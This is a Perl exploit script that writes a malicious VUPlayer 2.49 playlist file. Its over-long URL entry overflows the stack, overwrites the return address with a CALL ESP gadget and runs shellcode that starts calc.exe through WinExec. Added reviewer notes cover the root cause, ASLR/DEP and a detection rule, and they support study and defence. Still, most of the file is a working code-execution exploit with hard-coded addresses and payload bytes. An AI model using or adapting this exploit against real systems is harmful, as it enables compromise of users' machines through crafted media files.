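#!/usr/bin/perl
# Exploit Title: VUPlayer <= 2.49 Buffer Overflow Exploit in playlist
# Date: 30/05/2013
# Exploit Author: 0x00
# Vendor Homepage: http://www.vuplayer.com/
# Software Link: http://www.vuplayer.com/files/vuplayersetup.exe
# Version: 2.49
# Tested on: Windows Xp SP2 Spanish
#
# A buffer overflow vulnerability has been discovered in this version:
# opening a playlist that contains an over-long "URL" entry overflows the
# stack and allows code execution. The demonstration payload in this script
# starts the Windows calc.exe.
#
# Reviewer notes (defensive context):
#   * Per the author's description, the root cause is a playlist URL entry
#     copied to a stack buffer without a length check. The vulnerable code is
#     not part of this file, so the actual fix (bounded copy / length
#     validation in the playlist parser) has to be confirmed in the player.
#   * Both addresses below are hard-coded absolute values, so the proof of
#     concept depends on the exact system DLL build the author tested on.
#     The payload also runs directly from the stack. ASLR and DEP are the
#     platform mitigations aimed at exactly these two assumptions.
#   * The generated file is not a well-formed playlist: it is a single
#     "http://" entry of more than 1000 bytes that contains non-printable
#     bytes. A length or character-set check on .pls entries is a workable
#     detection and input-validation rule.

use strict;
use warnings;

# Padding that precedes the overwritten return address (author: "Fill buffer").
my $buffer = "A" x 1005;

# Return-address overwrite: little-endian address of a CALL ESP instruction.
my $offset = "\x5D\x38\x82\x7C";

# Little-endian address of kernel32.WinExec, embedded in the payload below.
my $call_winexec = "\x4D\x11\x86\x7C";

# Payload bytes (author: "Run calc.exe"); reproduced byte-for-byte.
my $shellcode = join '',
    "\x55\x8B\xEC\x32\xD2\x83\xEC\x10\xC6\x45\xF1\x63\xC6\x45\xF2\x61",
    "\xC6\x45\xF3\x6C\xC6\x45\xF4\x63\xC6\x45\xF5\x2E\xC6\x45\xF6\x65\xC6\x45",
    "\xF7\x78\xC6\x45\xF8\x65\x88\x55\xF9\x8D\x45\xF1\x33\xC9\xB1\x05\x51\x50\xBB",
    $call_winexec,
    "\xFF\xD3";

my $overflow = $buffer . $offset . $shellcode;

# The original used a bareword handle with open(FILE, "> BoF.pls") and never
# checked the result. The two-argument form parses the mode out of the string
# and strips the leading blank, so the file it creates is "BoF.pls"; the
# three-argument form below names that same file explicitly.
my $playlist = 'BoF.pls';

open(my $out, '>', $playlist)
    or die "Cannot open $playlist for writing: $!";

# No trailing newline is written, matching the original output.
print {$out} "http://" . $overflow
    or die "Cannot write to $playlist: $!";

# Buffered write errors only surface at close, so check it as well.
close($out)
    or die "Cannot close $playlist: $!";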